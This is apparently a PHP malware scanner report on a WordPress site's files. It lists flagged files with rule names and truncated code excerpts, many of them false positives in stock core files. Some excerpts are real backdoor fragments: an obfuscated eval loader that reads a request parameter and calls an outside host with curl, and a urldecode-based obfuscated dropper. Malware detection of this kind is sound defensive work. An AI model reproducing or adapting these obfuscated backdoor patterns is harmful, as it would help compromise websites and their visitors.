Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/var/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/.cpaddons_upgrade/index.php

Size: 14.35 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 7

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`
Sign 531da465 Dangerous Malware Signature (hash: 531da465)	<?php <?php $O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O0...

/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/class-pclzip.php

Size: 191.21 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Dangers: 5

Description	Match
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)`
Exploit nano Line: 2780 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)`
Exploit nano Line: 3702 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)`
Exploit nano Line: 3948 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)`
Sign 963e968a Line: 5677 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/class-wp-filesystem-direct.php

Size: 11.52 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Warns: 1

Description Match

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group($file) { $gid = @filegroup($file); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $this->exists($destination) ) return false; $r...

/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/class-wp-filesystem-ssh2.php

Size: 15.21 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Warns: 1

Description Match

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

<?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group($file) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $thi...

/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/file.php

Size: 50.86 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Dangers: 1

Description	Match
Exploit nano Line: 244 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $overrides['upload_error_handler'](&$file, $message )`

/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/ms.php

Size: 38.05 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Dangers: 1

Description	Match
Function str_rot13 eval_str_rot13 Line: 620 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php riny`

/custdata02/turtle/.cpaddons_upgrade/wp-content/plugins/cpaddons-site-software.php

Size: 1.58 kB Created: 2019-03-18 00:32:15 Modified: 2019-03-18 00:32:15 Warns: 1

Description	Match
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function]	`<?php create_function( '$a', "return null;" ) ); add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) )`

/custdata02/turtle/.cpaddons_upgrade/wp-includes/ID3/module.audio-video.quicktime.php

Size: 115.99 kB Created: 2019-03-18 00:32:15 Modified: 2019-03-18 00:32:15 Dangers: 1

Description	Match
Function str_rot13 eval_str_rot13 Line: 1560 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php riny`

/custdata02/turtle/.cpaddons_upgrade/wp-includes/SimplePie/Parse/Date.php

Size: 19.24 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1

Description	Match
Exploit concat_vars_with_spaces Line: 787 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code	`<?php $day . $fws . $month . $fws . $year . $fws .`

/custdata02/turtle/.cpaddons_upgrade/wp-includes/Text/Diff.php

Size: 12.65 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...

/custdata02/turtle/.cpaddons_upgrade/wp-includes/Text/Diff/Engine/native.php

Size: 15.47 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...

/custdata02/turtle/.cpaddons_upgrade/wp-includes/Text/Diff/Engine/shell.php

Size: 5.05 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 2

Description Match

Function assert Warning

Potentially dangerous function `assert`

<?php assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

<?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...

/custdata02/turtle/.cpaddons_upgrade/wp-includes/atomlib.php

Size: 11.09 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1

Description Match

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$k,$v', 'return "$k=\"$v\"";'); $this->map_xmlns_func = create_function('$p,$n', '$xd = "xmlns"; if(strlen($n[0])>0) $xd .= ":{$n[0]}"; return "{$xd}=\"{$n[1]}\"";'); } public function AtomParser() { self::__construct(); } function _p($msg) { if($this->debug) { print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n"; } } function error_handler($log_level, $log_text, $error_file, $error_line) { $this->error = $log_text; } function parse() { set_error_handler(array(&$this...

/custdata02/turtle/.cpaddons_upgrade/wp-includes/class-phpmailer.php

Size: 143.34 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Dangers: 1

Description	Match
Sign a408f408 Line: 1454 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/.cpaddons_upgrade/wp-includes/class-requests.php

Size: 29.09 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Dangers: 1

Description	Match
Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $transport[$cap_string]()`

/custdata02/turtle/.cpaddons_upgrade/wp-includes/class-snoopy.php

Size: 36.90 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1

Description Match

Function exec Warning

Potentially dangerous function `exec`